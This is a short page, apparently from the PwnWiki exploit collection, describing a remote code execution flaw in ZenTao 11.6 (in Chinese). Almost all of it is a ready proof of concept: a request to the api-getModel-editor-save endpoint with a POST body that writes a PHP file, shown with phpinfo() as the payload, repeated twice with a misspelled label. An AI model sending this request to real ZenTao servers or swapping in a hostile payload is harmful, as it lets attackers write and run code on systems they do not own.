禪道 11.6 遠程代碼執行漏洞
From PwnWiki
漏洞利用
遠程代碼執行命令phpnifo();
http://127.0.0.1/zentaopms/www/api-getModel-editor-save-filePath=1111 POST: fileContent=<?php phpinfo(); ?>
phpnifo();http://127.0.0.1/zentaopms/www/api-getModel-editor-save-filePath=1111 POST: fileContent=<?php phpinfo(); ?>